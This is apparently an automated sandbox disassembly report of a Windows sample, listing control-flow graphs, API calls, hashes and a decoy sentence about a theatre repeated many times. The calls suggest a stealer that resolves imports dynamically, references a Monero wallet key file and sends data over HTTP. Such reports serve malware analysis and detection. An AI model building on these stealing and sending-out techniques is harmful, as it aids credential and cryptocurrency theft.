                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 6b6435f183e1995f11b6bd29c927bf030d2a1718898e6ff8be8ceada4f93dcd4
                          • Instruction ID: 64b2330620c5ceef7b50a6ef57dd68c69d7c2650cf419e0846b8de95aecd4a0c
                          • Opcode Fuzzy Hash: 6b6435f183e1995f11b6bd29c927bf030d2a1718898e6ff8be8ceada4f93dcd4
                          • Instruction Fuzzy Hash: 4641E4706D67046EE72CBBE68842EFF77679F46708F505048B84456286CBB0660CEFA7

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 164880-164942 call 17a7a0 call 1647b0 call 17a740 * 5 InternetOpenA StrCmpCA 816 164944 801->816 817 16494b-16494f 801->817 816->817 818 164955-164acd call 178b60 call 17a920 call 17a8a0 call 17a800 * 2 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a920 call 17a8a0 call 17a800 * 2 InternetConnectA 817->818 819 164ecb-164ef3 InternetCloseHandle call 17aad0 call 169ac0 817->819 818->819 905 164ad3-164ad7 818->905 828 164ef5-164f2d call 17a820 call 17a9b0 call 17a8a0 call 17a800 819->828 829 164f32-164fa2 call 178990 * 2 call 17a7a0 call 17a800 * 8 819->829 828->829 906 164ae5 905->906 907 164ad9-164ae3 905->907 908 164aef-164b22 HttpOpenRequestA 906->908 907->908 909 164ebe-164ec5 InternetCloseHandle 908->909 910 164b28-164e28 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a740 call 17a920 * 2 call 17a8a0 call 17a800 * 2 call 17aad0 lstrlen call 17aad0 * 2 lstrlen call 17aad0 HttpSendRequestA 908->910 909->819 1021 164e32-164e5c InternetReadFile 910->1021 1022 164e67-164eb9 InternetCloseHandle call 17a800 1021->1022 1023 164e5e-164e65 1021->1023 1022->909 1023->1022 1024 164e69-164ea7 call 17a9b0 call 17a8a0 call 17a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00164915
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 0016493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00164ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00180DDB,00000000,?,?,00000000,?,",00000000,?,00CCFB08), ref: 00164DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00164E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00164E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00164E49
                          • InternetCloseHandle.WININET(00000000), ref: 00164EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00164EC5
                          • HttpOpenRequestA.WININET(00000000,00CCFC08,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00164B15
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • InternetCloseHandle.WININET(00000000), ref: 00164ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: e552fafee8b7bfaa1975bd1b0c885104da73d4c46b0c0c490dba3f8b8f4a1437
                          • Instruction ID: c84aad9c0e5ba540fec79ee6d288a23df7ee02f6beb75a57d62d409aac4d23f0
                          • Opcode Fuzzy Hash: e552fafee8b7bfaa1975bd1b0c885104da73d4c46b0c0c490dba3f8b8f4a1437
                          • Instruction Fuzzy Hash: 1212C072950118ABDB15EBA0DC62FEEB378BF65305F908199B11A63091DF702F49CF62
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 49edd355805275fb6842376e97ba8664f2e4662de8f6cf364eaece387fddb8f9
                          • Instruction ID: de7c43dab5245a0d267a5b1fecadb3bba5b9a7f0d52807b65833c29c1cdb3228
                          • Opcode Fuzzy Hash: 49edd355805275fb6842376e97ba8664f2e4662de8f6cf364eaece387fddb8f9
                          • Instruction Fuzzy Hash: 6CF04FB2944609ABC714DF98DD49FAEBBBCEB05B11F10025AFA05A3680C7791904CBA2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 45073d73345929d6bf0d4c340b1040569635caa24148e475449ce56d07dd5b1a
                          • Instruction ID: 214c360b8890f9fe7512a77baa9e3c01e4391bc03b061232562b04d3cd01bda9
                          • Opcode Fuzzy Hash: 45073d73345929d6bf0d4c340b1040569635caa24148e475449ce56d07dd5b1a
                          • Instruction Fuzzy Hash: 9FD017759002089BCB009BE098496AEBB7CEB0A312F000554D90562240EB315891CAA6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 179c10-179c1a 634 17a036-17a0ca LoadLibraryA * 8 633->634 635 179c20-17a031 GetProcAddress * 43 633->635 636 17a146-17a14d 634->636 637 17a0cc-17a141 GetProcAddress * 5 634->637 635->634 638 17a216-17a21d 636->638 639 17a153-17a211 GetProcAddress * 8 636->639 637->636 640 17a21f-17a293 GetProcAddress * 5 638->640 641 17a298-17a29f 638->641 639->638 640->641 642 17a337-17a33e 641->642 643 17a2a5-17a332 GetProcAddress * 6 641->643 644 17a344-17a41a GetProcAddress * 9 642->644 645 17a41f-17a426 642->645 643->642 644->645 646 17a4a2-17a4a9 645->646 647 17a428-17a49d GetProcAddress * 5 645->647 648 17a4dc-17a4e3 646->648 649 17a4ab-17a4d7 GetProcAddress * 2 646->649 647->646 650 17a515-17a51c 648->650 651 17a4e5-17a510 GetProcAddress * 2 648->651 649->648 652 17a612-17a619 650->652 653 17a522-17a60d GetProcAddress * 10 650->653 651->650 654 17a67d-17a684 652->654 655 17a61b-17a678 GetProcAddress * 4 652->655 653->652 656 17a686-17a699 GetProcAddress 654->656 657 17a69e-17a6a5 654->657 655->654 656->657 658 17a6a7-17a703 GetProcAddress * 4 657->658 659 17a708-17a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00CB66C0), ref: 00179C2D
                          • GetProcAddress.KERNEL32(76210000,00CB6300), ref: 00179C45
                          • GetProcAddress.KERNEL32(76210000,00CC97E0), ref: 00179C5E
                          • GetProcAddress.KERNEL32(76210000,00CC9870), ref: 00179C76
                          • GetProcAddress.KERNEL32(76210000,00CC97F8), ref: 00179C8E
                          • GetProcAddress.KERNEL32(76210000,00CCDCD0), ref: 00179CA7
                          • GetProcAddress.KERNEL32(76210000,00CBA820), ref: 00179CBF
                          • GetProcAddress.KERNEL32(76210000,00CCDC70), ref: 00179CD7
                          • GetProcAddress.KERNEL32(76210000,00CCDCE8), ref: 00179CF0
                          • GetProcAddress.KERNEL32(76210000,00CCDD48), ref: 00179D08
                          • GetProcAddress.KERNEL32(76210000,00CCDAD8), ref: 00179D20
                          • GetProcAddress.KERNEL32(76210000,00CB63E0), ref: 00179D39
                          • GetProcAddress.KERNEL32(76210000,00CB6500), ref: 00179D51
                          • GetProcAddress.KERNEL32(76210000,00CB6520), ref: 00179D69
                          • GetProcAddress.KERNEL32(76210000,00CB65C0), ref: 00179D82
                          • GetProcAddress.KERNEL32(76210000,00CCDD00), ref: 00179D9A
                          • GetProcAddress.KERNEL32(76210000,00CCDB08), ref: 00179DB2
                          • GetProcAddress.KERNEL32(76210000,00CBA780), ref: 00179DCB
                          • GetProcAddress.KERNEL32(76210000,00CB65E0), ref: 00179DE3
                          • GetProcAddress.KERNEL32(76210000,00CCDBB0), ref: 00179DFB
                          • GetProcAddress.KERNEL32(76210000,00CCDA90), ref: 00179E14
                          • GetProcAddress.KERNEL32(76210000,00CCDD60), ref: 00179E2C
                          • GetProcAddress.KERNEL32(76210000,00CCDD78), ref: 00179E44
                          • GetProcAddress.KERNEL32(76210000,00CB6340), ref: 00179E5D
                          • GetProcAddress.KERNEL32(76210000,00CCDB38), ref: 00179E75
                          • GetProcAddress.KERNEL32(76210000,00CCDAA8), ref: 00179E8D
                          • GetProcAddress.KERNEL32(76210000,00CCDB98), ref: 00179EA6
                          • GetProcAddress.KERNEL32(76210000,00CCDD18), ref: 00179EBE
                          • GetProcAddress.KERNEL32(76210000,00CCDC40), ref: 00179ED6
                          • GetProcAddress.KERNEL32(76210000,00CCDB20), ref: 00179EEF
                          • GetProcAddress.KERNEL32(76210000,00CCDD30), ref: 00179F07
                          • GetProcAddress.KERNEL32(76210000,00CCDBC8), ref: 00179F1F
                          • GetProcAddress.KERNEL32(76210000,00CCDC58), ref: 00179F38
                          • GetProcAddress.KERNEL32(76210000,00CBFE60), ref: 00179F50
                          • GetProcAddress.KERNEL32(76210000,00CCDAC0), ref: 00179F68
                          • GetProcAddress.KERNEL32(76210000,00CCDBE0), ref: 00179F81
                          • GetProcAddress.KERNEL32(76210000,00CB6360), ref: 00179F99
                          • GetProcAddress.KERNEL32(76210000,00CCDBF8), ref: 00179FB1
                          • GetProcAddress.KERNEL32(76210000,00CB6380), ref: 00179FCA
                          • GetProcAddress.KERNEL32(76210000,00CCDAF0), ref: 00179FE2
                          • GetProcAddress.KERNEL32(76210000,00CCDC10), ref: 00179FFA
                          • GetProcAddress.KERNEL32(76210000,00CB64C0), ref: 0017A013
                          • GetProcAddress.KERNEL32(76210000,00CB6540), ref: 0017A02B
                          • LoadLibraryA.KERNEL32(00CCDB50,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A03D
                          • LoadLibraryA.KERNEL32(00CCDB68,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A04E
                          • LoadLibraryA.KERNEL32(00CCDC88,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A060
                          • LoadLibraryA.KERNEL32(00CCDB80,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A072
                          • LoadLibraryA.KERNEL32(00CCDCA0,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A083
                          • LoadLibraryA.KERNEL32(00CCDC28,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A095
                          • LoadLibraryA.KERNEL32(00CCDCB8,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A0A7
                          • LoadLibraryA.KERNEL32(00CCDEC8,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A0B8
                          • GetProcAddress.KERNEL32(751E0000,00CB6560), ref: 0017A0DA
                          • GetProcAddress.KERNEL32(751E0000,00CCDEE0), ref: 0017A0F2
                          • GetProcAddress.KERNEL32(751E0000,00CC9338), ref: 0017A10A
                          • GetProcAddress.KERNEL32(751E0000,00CCDE80), ref: 0017A123
                          • GetProcAddress.KERNEL32(751E0000,00CB6600), ref: 0017A13B
                          • GetProcAddress.KERNEL32(700F0000,00CBA578), ref: 0017A160
                          • GetProcAddress.KERNEL32(700F0000,00CB6A20), ref: 0017A179
                          • GetProcAddress.KERNEL32(700F0000,00CBA5A0), ref: 0017A191
                          • GetProcAddress.KERNEL32(700F0000,00CCDD90), ref: 0017A1A9
                          • GetProcAddress.KERNEL32(700F0000,00CCDEB0), ref: 0017A1C2
                          • GetProcAddress.KERNEL32(700F0000,00CB67A0), ref: 0017A1DA
                          • GetProcAddress.KERNEL32(700F0000,00CB6880), ref: 0017A1F2
                          • GetProcAddress.KERNEL32(700F0000,00CCDDF0), ref: 0017A20B
                          • GetProcAddress.KERNEL32(753A0000,00CB6A40), ref: 0017A22C
                          • GetProcAddress.KERNEL32(753A0000,00CB69C0), ref: 0017A244
                          • GetProcAddress.KERNEL32(753A0000,00CCDDD8), ref: 0017A25D
                          • GetProcAddress.KERNEL32(753A0000,00CCDE20), ref: 0017A275
                          • GetProcAddress.KERNEL32(753A0000,00CB6700), ref: 0017A28D
                          • GetProcAddress.KERNEL32(76310000,00CBA870), ref: 0017A2B3
                          • GetProcAddress.KERNEL32(76310000,00CBA438), ref: 0017A2CB
                          • GetProcAddress.KERNEL32(76310000,00CCDE38), ref: 0017A2E3
                          • GetProcAddress.KERNEL32(76310000,00CB6920), ref: 0017A2FC
                          • GetProcAddress.KERNEL32(76310000,00CB6860), ref: 0017A314
                          • GetProcAddress.KERNEL32(76310000,00CBA618), ref: 0017A32C
                          • GetProcAddress.KERNEL32(76910000,00CCDEF8), ref: 0017A352
                          • GetProcAddress.KERNEL32(76910000,00CB6740), ref: 0017A36A
                          • GetProcAddress.KERNEL32(76910000,00CC93D8), ref: 0017A382
                          • GetProcAddress.KERNEL32(76910000,00CCDE50), ref: 0017A39B
                          • GetProcAddress.KERNEL32(76910000,00CCDF10), ref: 0017A3B3
                          • GetProcAddress.KERNEL32(76910000,00CB6760), ref: 0017A3CB
                          • GetProcAddress.KERNEL32(76910000,00CB6720), ref: 0017A3E4
                          • GetProcAddress.KERNEL32(76910000,00CCDE08), ref: 0017A3FC
                          • GetProcAddress.KERNEL32(76910000,00CCDE68), ref: 0017A414
                          • GetProcAddress.KERNEL32(75B30000,00CB67C0), ref: 0017A436
                          • GetProcAddress.KERNEL32(75B30000,00CCDE98), ref: 0017A44E
                          • GetProcAddress.KERNEL32(75B30000,00CCDF28), ref: 0017A466
                          • GetProcAddress.KERNEL32(75B30000,00CCDF40), ref: 0017A47F
                          • GetProcAddress.KERNEL32(75B30000,00CCDDA8), ref: 0017A497
                          • GetProcAddress.KERNEL32(75670000,00CB68A0), ref: 0017A4B8
                          • GetProcAddress.KERNEL32(75670000,00CB6A60), ref: 0017A4D1
                          • GetProcAddress.KERNEL32(76AC0000,00CB69A0), ref: 0017A4F2
                          • GetProcAddress.KERNEL32(76AC0000,00CCDDC0), ref: 0017A50A
                          • GetProcAddress.KERNEL32(6F4E0000,00CB67E0), ref: 0017A530
                          • GetProcAddress.KERNEL32(6F4E0000,00CB68C0), ref: 0017A548
                          • GetProcAddress.KERNEL32(6F4E0000,00CB68E0), ref: 0017A560
                          • GetProcAddress.KERNEL32(6F4E0000,00CCD898), ref: 0017A579
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6900), ref: 0017A591
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6940), ref: 0017A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6780), ref: 0017A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6800), ref: 0017A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0017A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0017A607
                          • GetProcAddress.KERNEL32(75AE0000,00CCD958), ref: 0017A629
                          • GetProcAddress.KERNEL32(75AE0000,00CC9448), ref: 0017A641
                          • GetProcAddress.KERNEL32(75AE0000,00CCD7A8), ref: 0017A659
                          • GetProcAddress.KERNEL32(75AE0000,00CCD790), ref: 0017A672
                          • GetProcAddress.KERNEL32(76300000,00CB6960), ref: 0017A693
                          • GetProcAddress.KERNEL32(6FE40000,00CCD8E0), ref: 0017A6B4
                          • GetProcAddress.KERNEL32(6FE40000,00CB6820), ref: 0017A6CD
                          • GetProcAddress.KERNEL32(6FE40000,00CCD880), ref: 0017A6E5
                          • GetProcAddress.KERNEL32(6FE40000,00CCD8B0), ref: 0017A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
